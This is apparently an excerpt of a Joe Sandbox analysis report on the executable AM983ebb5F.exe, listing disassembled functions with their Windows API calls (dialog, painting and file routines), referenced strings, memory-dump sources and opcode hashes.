                                                                                    • Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
                                                                                    • Opcode Fuzzy Hash: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                                                    • Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A
                                                                                    Function 00406DC6 Relevance: .3, Instructions: 334COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                    • Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
                                                                                    • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                    • Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05
                                                                                    Function 0040759D Relevance: .3, Instructions: 300COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                    • Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
                                                                                    • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                    • Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95
                                                                                    Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                                                                    • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                                                                    • DeleteObject.GDI32(00000000), ref: 0040503D
                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                                                                      • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                                                                    • ShowWindow.USER32(?,00000005), ref: 0040519F
                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                                                                    • GlobalFree.KERNEL32(?), ref: 0040537D
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405527
                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                                                                    • ShowWindow.USER32(00000000), ref: 00405539
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                    • String ID: $M$N
                                                                                    • API String ID: 2564846305-813528018
                                                                                    • Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                    • Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
                                                                                    • Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                    • Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58
                                                                                    Function 00404695 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                                                                    • GetSysColor.USER32(?), ref: 00404775
                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                                                                    • lstrlenW.KERNEL32(?), ref: 00404796
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                                                                    • SendMessageW.USER32(00000000), ref: 00404818
                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                                                                    • SetCursor.USER32(00000000), ref: 00404897
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                                                                    • SetCursor.USER32(00000000), ref: 004048B3
                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                    • String ID: : Completed$N
                                                                                    • API String ID: 3103080414-2140067464
                                                                                    • Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                    • Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
                                                                                    • Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                    • Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98
                                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                    • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                    • String ID: F
                                                                                    • API String ID: 941294808-1304234792
                                                                                    • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                    • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                                                    • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                    • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                                                    Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                                                                    • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                                                                      • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                      • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                    • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                                                                    • wsprintfA.USER32 ref: 0040621C
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                                                                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406305
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                                                                      • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\AM983ebb5F.exe,80000000,00000003), ref: 0040604B
                                                                                      • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                    • String ID: %ls=%ls$[Rename]
                                                                                    • API String ID: 2171350718-461813615
                                                                                    • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                                                    • Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
                                                                                    • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                                                    • Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD
                                                                                    Function 00406805 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\AM983ebb5F.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                    • CharNextW.USER32(?,"C:\Users\user\Desktop\AM983ebb5F.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                    • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                    Strings
                                                                                    • *?|<>/":, xrefs: 00406857
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00406806
                                                                                    • "C:\Users\user\Desktop\AM983ebb5F.exe", xrefs: 00406849
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Char$Next$Prev
                                                                                    • String ID: "C:\Users\user\Desktop\AM983ebb5F.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 589700163-3007628972
                                                                                    • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                    • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                                                                    • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                    • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                                                                    Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                                                                    • GetSysColor.USER32(00000000), ref: 00404598
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                                                                    • SetBkMode.GDI32(?,?), ref: 004045B0
                                                                                    • GetSysColor.USER32(?), ref: 004045C3
                                                                                    • SetBkColor.GDI32(?,?), ref: 004045D3
                                                                                    • DeleteObject.GDI32(?), ref: 004045ED
                                                                                    • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2320649405-0
                                                                                    • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                    • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                                                                    • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                    • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                                                                    Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                                      • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                    • String ID: 9
                                                                                    • API String ID: 163830602-2366072709
                                                                                    • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                    • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                                                                    • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                    • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
